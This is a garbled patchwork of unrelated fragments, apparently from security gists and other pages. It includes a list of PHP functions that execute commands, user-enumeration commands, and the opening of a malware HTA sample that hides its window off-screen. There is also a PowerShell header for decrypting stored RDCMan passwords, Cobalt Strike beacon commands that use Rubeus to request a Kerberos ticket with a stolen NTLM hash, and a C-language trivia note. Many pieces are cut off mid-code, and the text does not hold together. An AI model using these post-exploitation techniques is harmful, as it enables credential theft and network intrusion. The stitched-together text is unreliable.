exec - Returns last line of command's output
passthru - Passes command's output directly to the browser
system - Passes command's output directly to the browser and returns last line
shell_exec - Returns command's output
`` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
#!/usr/bin/python
#
# import masscan output and run an nmap scan on the results
#
import sys
import argparse
from libnmap.parser import NmapParser, NmapParserException
from libnmap.process import NmapProcess
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.
There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.
1. Combined type and variable/field declaration, inside a struct scope [https://godbolt.org/g/Rh94Go]
struct foo {
    struct bar {
        int x;
# There is no facility to replace passwords in RDCMan once they are stored. The only way is to create a new custom credential.
# If you open your *.rdg file in a text editor, locate the stored <password>, you can then decrypt it using this script.
# This script can also encrypt a plain text password in rdg format which can be used to overwrite an existing one in the xml.
Add-Type -AssemblyName System.Security;
Function EncryptPassword {
    [CmdletBinding()]
    param([String]$PlainText = $null)
    # convert to RDCMan format: (null terminated chars)
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
Portable Version KEYS:
Standard Version KEYS: